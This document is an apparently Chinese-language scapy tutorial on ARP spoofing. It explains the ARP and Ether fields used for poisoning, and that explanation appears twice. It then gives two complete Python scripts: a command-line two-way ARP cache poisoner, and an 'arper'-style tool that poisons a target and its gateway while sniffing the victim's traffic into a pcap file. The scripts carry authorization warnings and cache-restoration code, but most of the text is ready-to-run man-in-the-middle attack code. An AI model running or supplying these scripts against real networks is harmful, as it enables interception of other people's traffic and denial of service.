python arp欺骗
ls(ARP())
hwtype : XShortField = 1 ('1')
ptype : XShortEnumField = 2048 ('2048')
hwlen : FieldLenField = None ('None')
plen : FieldLenField = None ('None')
op : ShortEnumField = 1 ('1')
hwsrc : MultipleTypeField (SourceMACField, StrFixedLenField) = 'dc:a6:32:bb:49:9d' ('None')
psrc : MultipleTypeField (SourceIPField, SourceIP6Field, StrFixedLenField) = '192.168.1.100' ('None')
hwdst : MultipleTypeField (MACField, StrFixedLenField) = '00:00:00:00:00:00' ('None')
pdst : MultipleTypeField (IPField, IP6Field, StrFixedLenField) = '0.0.0.0' ('None')
>>>
op 操作码:默认为 1,取值 1 或 2,分别代表 ARP 请求(who-has)或 ARP 应答(is-at)。投毒时发送的是 op=2 的应答:ARP 本身无状态、无认证,大多数主机收到应答就直接更新缓存,并不检查自己是否曾发出过对应的请求。
hwsrc:发送方 MAC 地址,用于告诉对方"这个 IP 对应的 MAC 是什么",默认为本机网卡的 MAC,所以可以省略此属性。投毒包正是利用这个默认值:把伪造的 psrc(网关 IP)绑定到攻击者自己的 MAC 上。
psrc:发送方 IP 地址,用于告诉对方"我的 IP 是什么",可以任意填写,这就是伪装(欺骗)的关键字段。
这报文发给谁,由下面的两个属性决定:
hwdst: 对方的MAC地址
pdst:对方的IP地址
ls(Ether())
dst : DestMACField = WARNING: Mac address to reach destination not found. Using broadcast.
'ff:ff:ff:ff:ff:ff' ('None')
src : SourceMACField = 'dc:a6:32:bb:49:9d' ('None')
type : XShortEnumField = 36864 ('36864')
>>>
构造ARP包:
欺骗目标主机,让它相信"我就是网关":
发送给目标 主机
hwtype : XShortField = 1 ('1')
ptype : XShortEnumField = 2048 ('2048')
hwlen : FieldLenField = None ('None')
plen : FieldLenField = None ('None')
op : ShortEnumField = 1 ('1')
hwsrc : MultipleTypeField (SourceMACField, StrFixedLenField) = 'dc:a6:32:bb:49:9d' ('None')
psrc : MultipleTypeField (SourceIPField, SourceIP6Field, StrFixedLenField) = '192.168.1.100' ('None')
hwdst : MultipleTypeField (MACField, StrFixedLenField) = '00:00:00:00:00:00' ('None')
pdst : MultipleTypeField (IPField, IP6Field, StrFixedLenField) = '0.0.0.0' ('None')
>>>
op 操作码:默认为 1,取值 1 或 2,分别代表 ARP 请求(who-has)或 ARP 应答(is-at)。投毒时发送的是 op=2 的应答:ARP 本身无状态、无认证,大多数主机收到应答就直接更新缓存,并不检查自己是否曾发出过对应的请求。
hwsrc:发送方 MAC 地址,用于告诉对方"这个 IP 对应的 MAC 是什么",默认为本机网卡的 MAC,所以可以省略此属性。投毒包正是利用这个默认值:把伪造的 psrc(网关 IP)绑定到攻击者自己的 MAC 上。
psrc:发送方 IP 地址,用于告诉对方"我的 IP 是什么",可以任意填写,这就是伪装(欺骗)的关键字段。
这报文发给谁,由下面的两个属性决定:
hwdst: 对方的MAC地址
pdst:对方的IP地址
ls(Ether())
dst : DestMACField = WARNING: Mac address to reach destination not found. Using broadcast.
'ff:ff:ff:ff:ff:ff' ('None')
src : SourceMACField = 'dc:a6:32:bb:49:9d' ('None')
type : XShortEnumField = 36864 ('36864')
>>>
构造ARP包:
欺骗目标主机,让它相信"我就是网关":
发送给目标 主机
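"""Minimal two-way ARP cache poisoner built on scapy.

Usage: sudo python3 arpspoof -i <interface> -g <gateway_ip> <target_ip>

Only run this on a network you are authorised to test. Without
``net.ipv4.ip_forward=1`` on the attacking host the target simply loses
connectivity instead of being transparently relayed, which is an obvious tell
and a denial of service for the victim. Dynamic ARP Inspection / arpwatch-style
monitoring will flag the flapping IP-to-MAC bindings this script creates.
"""
import sys
import time
from optparse import OptionParser

from scapy.all import ARP, conf, getmacbyip, send


def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Re-advertise the real IP-to-MAC bindings to undo the poisoning.

    Sends ARP replies for ``gateway_ip -> gateway_mac`` to the target and
    ``target_ip -> target_mac`` to the gateway, each five times, so both sides
    overwrite the poisoned entries they learned from ``attact_target``.

    The ARP-payload ``hwdst`` is the broadcast address, as in the original;
    the Ethernet destination of the frame is resolved by scapy's ``send``
    from ``pdst``.
    """
    print("[*]恢复ARP缓冲。。。")
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
    # The original sent this one only once; repeat it as well so the gateway
    # side is restored as reliably as the target side.
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)


def attact_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Poison both the target and the gateway every 2 s until Ctrl-C.

    Name kept (including the typo) for compatibility with existing callers.
    ``hwsrc`` is left at scapy's default, i.e. this host's MAC, which is what
    binds the spoofed IP to the attacker.
    """
    # To the target: "gateway_ip is at <our MAC>".
    poison_target = ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst=target_mac)
    # To the gateway: "target_ip is at <our MAC>".
    # The original used psrc=gateway_ip here, which poisons nothing: the
    # gateway would only receive a bogus reply about its own address, so
    # return traffic never reached the attacker.
    poison_gateway = ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst=gateway_mac)

    print("[]正在进行投毒[CTRL+C结束「")
    try:
        while True:
            send(poison_target)
            send(poison_gateway)
            time.sleep(2)
    except KeyboardInterrupt:
        # Always restore on the way out so the victims are not left cut off.
        restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    print("[*]ARP投毒结束")


def main():
    """Parse -i/-g/host, resolve both MACs, then start the poisoning loop.

    Exits non-zero when either MAC cannot be resolved; proceeding with a
    ``None`` MAC would make scapy raise in the middle of the attack.
    """
    usage = 'sudo python3 arpspoof [-i interface] [-g gateway] host'
    parser = OptionParser(usage)
    parser.add_option('-i', dest="interface", type='string', help='网卡')
    parser.add_option('-g', dest='gateway', type='string', help='网关')
    (options, args) = parser.parse_args()
    if len(args) != 1 or options.interface is None or options.gateway is None:
        parser.print_help()
        sys.exit(0)

    interface = options.interface    # e.g. "wlan0"
    gateway_ip = options.gateway     # e.g. "192.168.1.1"
    # The usage string promises a positional `host`; the original ignored it
    # and always attacked a hard-coded 192.168.1.254.
    target_ip = args[0]

    conf.iface = interface
    conf.verb = 0

    gateway_mac = getmacbyip(gateway_ip)
    if gateway_mac is None:
        print("mac获取失败")
        sys.exit(1)  # was `sys.eixt(0)` -> AttributeError
    print(gateway_ip, gateway_mac)

    target_mac = getmacbyip(target_ip)
    if target_mac is None:
        print("获取目标MAC失败")
        sys.exit(1)  # the original fell through and attacked with hwdst=None
    print("目标主机:%s MAC:%s" % (target_ip, target_mac))

    attact_target(gateway_ip, gateway_mac, target_ip, target_mac)


if __name__ == "__main__":
    main()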
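"""ARP poisoner plus sniffer (Black Hat Python "arper" variant) on scapy.

Poisons target and gateway from a worker thread while the main thread sniffs
``packet_count`` packets to/from the target into ``arper.pcap``, then restores
both ARP caches.

Only run this on a network you are authorised to test. Without
``net.ipv4.ip_forward=1`` on this host the target loses connectivity instead
of being transparently relayed; arpwatch / Dynamic ARP Inspection will flag
the flapping bindings.
"""
import sys
import threading
import time

from scapy.all import ARP, Ether, conf, send, sniff, srp, wrpcap


def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Re-advertise the genuine bindings to both victims (five replies each).

    The original ended with ``os.kill(os.getpid(), signal.SIGINT)`` to "stop"
    the poisoning thread. Python only delivers KeyboardInterrupt to the main
    thread, so that never stopped the worker; it only re-raised inside the
    main thread's own ``except KeyboardInterrupt`` handler, leaving the
    non-daemon worker poisoning forever. Shutdown is now coordinated with a
    ``threading.Event`` in ``main``.
    """
    print("[*] Restoring target... ")
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)


def get_mac(ip_address):
    """Resolve ``ip_address`` with a broadcast who-has; return the MAC or None.

    Takes the first answer it gets, so a second spoofer on the segment could
    feed us a wrong MAC; acceptable for a lab tool, not for anything relied on.
    """
    answered, _unanswered = srp(
        Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address), timeout=2, retry=10
    )
    for _sent, reply in answered:
        return reply[Ether].src
    return None


def poison_target(gateway_ip, gateway_mac, target_ip, target_mac, stop_event=None):
    """Send the two poison replies every 2 s until ``stop_event`` is set.

    ``stop_event`` is optional for backward compatibility: when it is None the
    loop runs until Ctrl-C, which only works when called from the main thread
    (worker threads never receive KeyboardInterrupt). When run in a thread,
    pass an Event and let the caller do the restoration.
    """
    # "gateway_ip is at <our MAC>" -> target; "target_ip is at <our MAC>" -> gateway.
    # hwsrc defaults to this host's MAC, which is what makes the spoof bind.
    to_target = ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst=target_mac)
    to_gateway = ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst=gateway_mac)

    print("[*] Beginning the ARP poison. [CTRL-C to stop]")
    try:
        while stop_event is None or not stop_event.is_set():
            send(to_target)
            send(to_gateway)
            if stop_event is None:
                time.sleep(2)
            else:
                # Doubles as the 2 s pacing and wakes immediately on stop.
                stop_event.wait(2)
    except KeyboardInterrupt:
        # Main-thread-only path, kept for direct callers.
        restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    print("[*] ARP poison attack finished. ")


interface = "wlan0"
target_ip = "192.168.1.254"  # host under attack
gateway_ip = "192.168.1.1"   # gateway
packet_count = 1000          # packets to sniff before stopping (not an "attack count")


def main():
    """Resolve MACs, poison in a worker thread, sniff, then always restore."""
    conf.iface = interface
    conf.verb = 0  # silence scapy's per-send output
    print("[*] Setting up %s" % (interface))

    gateway_mac = get_mac(gateway_ip)
    if gateway_mac is None:
        print("[!!!] Failed to get gateway MAC. Exiting. ")
        sys.exit(1)
    print("[*] Gateway %s is at %s" % (gateway_ip, gateway_mac))

    target_mac = get_mac(target_ip)
    if target_mac is None:
        print("[!!!] Failed to get target MAC. Exiting. ")
        sys.exit(1)
    print("[*] Target %s is at %s" % (target_ip, target_mac))

    stop_event = threading.Event()
    poison_thread = threading.Thread(
        target=poison_target,
        args=(gateway_ip, gateway_mac, target_ip, target_mac, stop_event),
        daemon=True,  # never let a stuck worker keep the process (and the attack) alive
    )
    poison_thread.start()
    try:
        print("[*] Starting sniffer for %d packets" % (packet_count))
        bpf_filter = "ip host %s" % target_ip
        packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
        wrpcap('arper.pcap', packets)
    except KeyboardInterrupt:
        pass
    finally:
        # Runs on normal completion, Ctrl-C and any sniff/wrpcap error, so the
        # victims' ARP caches are repaired on every exit path.
        stop_event.set()
        poison_thread.join()
        restore_target(gateway_ip, gateway_mac, target_ip, target_mac)


if __name__ == "__main__":
    main()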
